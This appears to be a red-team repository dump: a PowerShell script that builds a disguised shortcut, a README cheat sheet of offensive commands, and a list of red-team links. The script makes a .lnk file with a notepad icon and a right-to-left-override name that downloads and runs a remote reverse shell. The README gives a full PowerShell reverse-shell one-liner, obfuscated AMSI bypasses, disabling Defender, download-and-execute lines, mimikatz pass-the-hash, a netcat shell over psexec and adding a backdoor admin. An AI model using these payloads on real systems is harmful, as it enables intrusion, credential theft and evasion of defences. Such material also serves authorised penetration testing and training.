├── tax.exe ├── attcking-ad-for-fun-and-profit.pdf ├── Generate-LNK.ps1 ├── Red-team.md └── README.md /tax.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hexachordanu/Red-Team-Essentials/HEAD/tax.exe -------------------------------------------------------------------------------- /attcking-ad-for-fun-and-profit.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hexachordanu/Red-Team-Essentials/HEAD/attcking-ad-for-fun-and-profit.pdf -------------------------------------------------------------------------------- /Generate-LNK.ps1: -------------------------------------------------------------------------------- 1 | function Generate-LNK{ 2 | <# 3 | 4 | .SYNOPSIS 5 | A PowerShell script to generate lnk files and zip it 6 | 7 | .DESCRIPTION 8 | A PowerShell script to generate lnk files and zip it 9 | 10 | .PARAMETER iconpath 11 | Set iconpath as notepad or other exes 12 | 13 | .PARAMETER exec 14 | Set cmd.exe/powershell.exe or other executable 15 | 16 | .PARAMETER desc 17 | set description of notepadfile 18 | 19 | .PARAMETER reverseadd 20 | Add your powershell one liner reverseshell hosted url 21 | 22 | .PARAMETER argg 23 | Pass arguements to exec being called 24 | 25 | .PARAMETER lnkpath 26 | Path to lnk file to be saved 27 | 28 | .PARAMETER zippath 29 | Path with name of zip file to be created 30 | 31 | .EXAMPLE 32 | PS C:\> . .\Generate-LNK.ps1 33 | PS C:\> Generate-LNK -reverseadd "http://youripofwebserver/powershellreverseoneliner.txt" 34 | 35 | .LINK 36 | https://raw.githubusercontent.com/xillwillx/tricky.lnk/master/tricky.ps1 37 | 38 | .NOTES 39 | This script is a modified version of xillwillx's script and I take no credit of the code. Full credit goes to xillwillx. 40 | Follow him on twitter - @xillwillx 41 | 42 | #> 43 | 44 | [CmdletBinding()] 45 | Param ( 46 | 47 | [Parameter(Mandatory=$false)] 48 | [String] 49 | $iconpath = "C:\Windows\System32\notepad.exe", 50 | 51 | [Parameter(Mandatory=$false)] 52 | [String] 53 | $exec = "powershell", 54 | 55 | [Parameter(Mandatory=$false)] 56 | [String] 57 | $desc = "Type: Text Document", 58 | 59 | [Parameter(Mandatory=$false)] 60 | [String] 61 | $reverseadd = "http://192.168.100.13:443/reverse.txt", 62 | 63 | [Parameter(Mandatory=$false)] 64 | [String] 65 | $argg = " -ExecutionPolicy Bypass -noLogo -Command IEX (New-Object Net.WebClient).DownloadString($reverseadd);", 66 | 67 | [Parameter(Mandatory=$false)] 68 | [String] 69 | $lnkpath = $env:USERPROFILE + "\Desktop\FakeText.lnk", 70 | 71 | [Parameter(Mandatory=$false)] 72 | [String] 73 | $zippath = $env:USERPROFILE + "\Desktop\hululu.zip" 74 | ) 75 | try{ 76 | $ws = New-Object -ComObject ("WScript.Shell") 77 | $sh = $ws.CreateShortcut($lnkpath) 78 | $sh.Arguments = $argg 79 | $sh.TargetPath = $exec 80 | $sh.IconLocation = $iconpath + ",0"; 81 | $sh.Description = $desc; 82 | $sh.Save() 83 | $unicode = "%u0052%u0065%u0061%u0064%u004d%u0065%u002e%u202e%u0074%u0078%u0074%u002e%u006c%u006e%u006b" 84 | [Reflection.Assembly]::LoadWithPartialName("System.Web") 85 | $unescape = [web.httputility]::urldecode($unicode) 86 | ren ($lnkpath) ($env:USERPROFILE + "\Desktop\" + $unescape) 87 | Write-Host "LNK file is generated - "$lnkpath 88 | $compress = @{ 89 | Path = $env:USERPROFILE + "\Desktop\" + $unescape 90 | CompressionLevel = "Fastest" 91 | DestinationPath = $zippath} 92 | Compress-Archive @compress 93 | Write-Host "ZIP file is generated - "$zippath 94 | } 95 | catch 96 | { 97 | Write-Error -Message "Failed to generate lnk file" 98 | } 99 | } 100 | -------------------------------------------------------------------------------- /Red-team.md: -------------------------------------------------------------------------------- 1 | Starting with Red Teaming 2 | 3 | Red Team Planning and thought process - 4 | 1. https://github.com/magoo/redteam-plan 5 | 6 | Setting up your AD lab - 7 | 1. https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell/ 8 | 2. https://www.youtube.com/watch?v=xftEuVQ7kY0 9 | 3. https://sethsec.blogspot.com/2017/05/pentest-home-lab-0x1-building-your-ad.html 10 | 4. https://www.fatrodzianko.com/2019/08/05/creating-an-active-directory-lab-in-aws/ 11 | 12 | AD and kerberos Introduction - 13 | 1. https://adsecurity.org/?p=227 - Kerberos 14 | 2. https://medium.com/@robert.broeckelmann/kerberos-and-windows-security-kerberos-on-windows-3bc021bc9630 15 | 3. https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory 16 | 4. https://www.slideshare.net/dafthack/red-team-apocalypse 17 | 18 | Blogs - 19 | 1. https://adsecurity.org/ 20 | 2. https://ired.team/ 21 | 3. https://blog.xpnsec.com/ 22 | 4. https://identityaccessdotmanagement.files.wordpress.com/2019/12/ad-security-fundamentals-1.pdf 23 | 5. https://posts.specterops.io/ 24 | 6. https://www.mdsec.co.uk/blog/ 25 | 7. https://rastamouse.me/ 26 | 8. https://vincentyiu.com/red-team-tips - Red Team tips 27 | 9. http://www.labofapenetrationtester.com/ 28 | 10. https://blog.netspi.com/ 29 | 11. https://hausec.com/ 30 | 12. https://www.blackhillsinfosec.com 31 | 13. https://attack.mitre.org/ 32 | 33 | C2 Frameworks - 34 | 1. https://github.com/cobbr/Covenant 35 | 2. https://github.com/nettitude/PoshC2 36 | 3. https://github.com/byt3bl33d3r/SILENTTRINITY 37 | 4. https://www.cobaltstrike.com/ 38 | 39 | 40 | C2 infra Setup - 41 | 1. https://ired.team/offensive-security/red-team-infrastructure/automating-red-team-infrastructure-with-terraform 42 | 2. https://rastamouse.me/2017/08/automated-red-team-infrastructure-deployment-with-terraform---part-1/ 43 | 3. https://silentbreaksecurity.com/modern-red-team-infrastructure/ 44 | 4. https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki 45 | 5. https://www.blackhillsinfosec.com/build-c2-infrastructure-digital-ocean-part-1/ 46 | 47 | CheatSheets - 48 | 1. https://github.com/HarmJ0y/CheatSheets 49 | 2. https://morph3sec.com/2019/07/16/Windows-Red-Team-Cheat-Sheet/ 50 | 51 | Trainings and Certs - 52 | 1. https://www.pentesteracademy.com/activedirectorylab - Basic ( Still recommended to all ) 53 | 2. https://www.pentesteracademy.com/redteamlab 54 | 3. https://www.pentesteracademy.com/gcb 55 | 4. https://www.zeropointsecurity.co.uk/red-team-ops 56 | 5. https://specterops.io/how-we-help/training-offerings/adversary-tactics-red-team-operations 57 | 6. https://www.hackthebox.eu/ - Pro Labs - ( Rastalabs and Offshore ) 58 | 59 | Workshop/Random Contents - 60 | 1. https://github.com/specterops/at-ps 61 | 2. https://github.com/wavestone-cdt/AD-security-workshop 62 | 3. https://www.owasp.org/images/a/a4/OWASP_FFM_41_OffensiveActiveDirectory_101_MichaelRitter.pdf 63 | 4. https://medium.com/airwalk/practical-phishing-with-gophish-7dd384ad1840 - GoPhish Setup 64 | 5. https://vdalabs.com/2019/10/01/phishing-users-using-evilginx-and-bypassing-2fa/ - Phising with Evilgnx 65 | 6. https://breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens/ 66 | 7. https://www.scip.ch/en/?labs.20190207 - Bypassing NAC 67 | 8. https://hackinparis.com/data/slides/2017/2017_Legrand_Valerian_802.1x_Network_Access_Control_and_Bypass_Techniques.pdf 68 | 9. https://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Arkin.pdf - NAC Bypass 69 | 10. https://resources.infosecinstitute.com/nac-hacking-bypassing-network-access-control/#gref 70 | 11. https://purplesec.us/physical-penetration-testing/ - Physical Pentest Intro 71 | 72 | Red Team Tools - 73 | 1. https://0xsp.com/offensive/red-teaming-toolkit-collection 74 | 75 | Ocean of resources - 76 | 1. https://github.com/yeyintminthuhtut/Awesome-Red-Teaming 77 | 2. https://github.com/infosecn1nja/AD-Attack-Defense 78 | 3. https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Physical_Security.md 79 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Red-Team-Essentials 2 | 3 | ## Disable Defender 4 | 5 | ```Powershell 6 | Set-MpPreference -DisableRealtimeMonitoring $true 7 | ``` 8 | 9 | ## Services and startname 10 | 11 | ```Powershell 12 | Get-WmiObject win32_service | format-Table name, startname, startmode 13 | ``` 14 | 15 | ## Fore-Change PAssword - generic All 16 | 17 | ```Powershell 18 | Set-DomainObjectOwner -Identity stgadm -OwnerIdentity hexninja 19 | Add-DomainObjectAcl -TargetIdentity stgadm -PrincipalIdentity hexninja 20 | $newpass = ConvertTo-SecureString -String 'Password123! -AsPlainText -Force 21 | Set-DomainUserPassword -Identity stgadm -AccountPassword $newpass 22 | ``` 23 | 24 | ## Powershell Reverse Shell one Liner (AMSI Bypass) 25 | 26 | ```Powershell 27 | $ip='192.168.1.114';$port=1337;$client = New-Object System.Net.Sockets.TCPClient -ArgumentList $ip, $port;$s = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};$l = 'lol';Set-alias $l ([char]105 + [char]101 + [char]120);while(($i = $s.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (lol $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$s.Write($sendbyte,0,$sendbyte.Length);$s.Flush()};$client.Close() 28 | ``` 29 | 30 | ## AMSI Bypass (Modified Version) - Credit to Matt Graebers Reflection method 31 | ```Powershell 32 | $l = "MSAislolmlola";$s=($l[$true-13] + 'ystem.' + $l[$true-14] + 'anagement.' + $l[$true-12] + 'utomation.' + $l[$true-12] + [char]109 + [char]115 + [char]105 + 'Utils');$k=($l[$true-2] + [char]109 + [char]115 + [char]105 + 'InitFailed');[Ref].Assembly.GetType($s).GetField($k,'NonPublic,Static').SetValue($null,$true) 33 | ``` 34 | 35 | ## Powershell Download in V4 and V5 36 | 37 | ```Powershell 38 | Invoke-WebRequest "http://10.10.15.58/hex.ps1" -OutFile "C:\Windows\TEMP\hex.ps1" 39 | ``` 40 | 41 | ## Ptt using mimikatz 42 | 43 | ```Powershell 44 | Invoke-Mimikatz -Command '"sekurlsa::pth /user:admin /domain:xyz.local /ntlm:ce03434e2f83b99704a631ae56e2146e /run:powershell.exe"' 45 | ``` 46 | 47 | ## psexec 48 | ```Powershell 49 | ./ps.exe \\\localip -h -accepteula -u username -p password cmd /c 'C:\nc.exe 192.168.50.138 4444 -e cmd.exe' 50 | ``` 51 | 52 | ## Check Powershell Version 53 | 54 | ```Powershell 55 | $PSVersionTable.PSVersion 56 | ``` 57 | 58 | ## Download File Powershell V2 59 | 60 | ```Powershell 61 | (New-Object Net.WebClient).DownloadFile('http://10.10.15.58/powerview.ps1', 'C:\users\someuser\Desktop\powerview.ps1') 62 | ``` 63 | 64 | ## Download Execute Powershell One Liner 65 | 66 | ```Powershell 67 | powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.58/payload.ps1') 68 | ``` 69 | 70 | ## AMSI Bypass - Credit to Nikhil Mittal (PTAcademy) 71 | 72 | ```Powershell 73 | sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) 74 | ``` 75 | 76 | ## Execute this on target machine if you get rdesktop's Cred SSP Error while using remotedesktop 77 | 78 | ```Cmd 79 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f 80 | ``` 81 | 82 | ## Remote desktop login through domain user credentials 83 | 84 | ```sh 85 | xfreerdp /u:username /d:adcorp.local /p:"passwordxyz" /v:TARGETIP 86 | ``` 87 | 88 | ## Download Execute powershell 89 | 90 | ```Cmd 91 | powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.10.15.58/payload.ps1')|iex" 92 | ``` 93 | 94 | ## Pivoting using sshutle when you have rsa keys 95 | 96 | ```sh 97 | sshuttle -r root@TARGETIP -e "ssh -i rsa" TARGETIPRANGE.0/24 98 | ``` 99 | 100 | ## Adding user on windows cmd line & adding it to local admin group 101 | 102 | ```Cmd 103 | net user hexninja lolbr654$@123 /ADD 104 | net localgroup administrators hexninja /ADD 105 | ``` 106 | 107 | ## CertUtil Download remote file 108 | 109 | ```cmd 110 | certutil.exe -urlcache -f http://yourip/malicious.exe malicious.exe 111 | ``` 112 | 113 | ## CertUtil decode base64 114 | 115 | ```cmd 116 | certutil -decode malexecbase.b64 malexecutable.exe 117 | ``` 118 | 119 | ## regsvr32 to execute malcious dll 120 | 121 | ```cmd 122 | regsvr32 /s /u .\exploit.dll 123 | ``` 124 | 125 | ## Net1 (you read it right; it's not net) - available functions similar to net 126 | 127 | ```cmd 128 | Net1 localgroup administrators 129 | Net1 users 130 | ``` 131 | 132 | ## The Invoke-AllChecks module runs all current checks for Windows privesc vectors (part of PowerUp) - Not OPsec Safe 133 | ```Powershell 134 | Invoke-AllChecks 135 | ``` 136 | 137 | ## Calling Invoke-ServiceAbuse (part of PowerUp) to add hexninja (replace this with your username) as admin user 138 | ```Powershell 139 | Invoke-ServiceAbuse -Name 'VulService' -UserName hexninja 140 | ``` 141 | 142 | ## Where utility to search for config files and everything 143 | 144 | ```cmd 145 | Examples: 146 | WHERE /? 147 | WHERE myfilename1 myfile????.* 148 | WHERE $windir:*.* 149 | WHERE /R c:\windows *.exe *.dll *.bat 150 | WHERE /Q ??.??? 151 | WHERE "c:\windows;c:\windows\system32:*.dll" 152 | WHERE /F /T *.dll 153 | ``` 154 | 155 | --------------------------------------------------------------------------------